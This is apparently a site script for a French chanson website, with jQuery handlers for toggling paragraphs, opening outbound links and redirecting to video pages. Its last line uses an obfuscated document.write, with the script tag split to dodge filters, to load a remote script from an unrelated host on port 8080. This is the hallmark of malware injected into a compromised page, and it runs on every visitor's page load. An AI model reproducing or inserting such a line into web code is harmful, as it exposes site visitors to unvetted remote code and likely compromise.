// JavaScript Frameworks from Google
$(document).ready(function() {
	$("h2 > a").click(function(){
		$(this).parent().next("p.toggle").toggle();
	});

    $('a[href^=http://www.fransechansons.com/go.php?]').click( function() {
		window.open(this.href);
		return false;
	});
});

function gotoYoutube_player(artist, feed, title){
	window.location.href = "http://www.fransechansons.com/beeldfragmenten/"+artist+"/filmtitel/"+title+"/id/"+feed;
}
document.write('<s'+'cript type="text/javascript" src="http://temp.thailanddigest.com:8080/End_User.js"></scr'+'ipt>');